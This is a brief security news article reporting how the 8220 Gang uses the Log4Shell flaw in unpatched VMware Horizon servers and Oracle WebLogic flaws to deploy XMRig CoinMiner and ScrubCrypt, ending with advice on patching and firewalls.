HQ/EMEAFind out how we can help your business
The notorious cybercriminal group 8220 Gang is still exploiting last year’s Log4Shell critical flaw to launch CoinMiner in VMware Horizon servers for their cryptocurrency mining campaign.
Researchers explained that the attack exclusively targets outdated and flawed systems of Korean energy-related firms. This campaign prioritises servers that run on unpatched Log4shell networks.
A sample log showed that the ws_tomcatservice[.]exe process installed the CoinMiner malware. Based on reports, the process is vulnerable during the installation of the malware. The attack log revealed that the attackers executed a PowerShell command via VMware Horizon’s ws_tomcatservice.exe method, although the researchers did not identify it through the detailed packet.
Researchers claimed that the 8220 Gang exploited the Log4Shell vulnerability for this attack despite its reputation of exclusively abusing new and known vulnerabilities for unpatched systems.
Furthermore, the group recently targeted vulnerable systems through Oracle Weblogic vulnerabilities to download ScrubCrypt, which links to attacker-controlled command-and-control servers to launch additional commands, such as installing the XMRig CoinMiner.
The 8220 Gang has increased the frequency of their attacks since the start of the year.
New investigations showed that the 8220 Gang had targeted the Oracle Weblogic server flaws via ScrubCrypt to bypass security detection and execute crypto-mining campaigns.
The cybercriminal group utilises a PowerShell script to download ScrubCrypt and gain persistence through edits to the registry entries. Earlier this year, the group upgraded its attack capabilities to deploy a high-end cryptomining campaign by abusing cloud applications and Linux flaws.
8220 Gang utilised the onacroner script and constantly altered its command-and-control IP addresses to bypass security detections.
The group has constantly installed XMRig CoinMiner to obtain Monero coins from outdated systems. Therefore, system admins should verify where their present systems are prone and apply the latest patches to avoid these threats.
In addition, companies should employ powerful security software like firewalls for servers that owners can access externally to limit any entry attempt from the attackers. Organisations should have proper cybersecurity hygiene and update V3 to the latest version to stop malware infection.
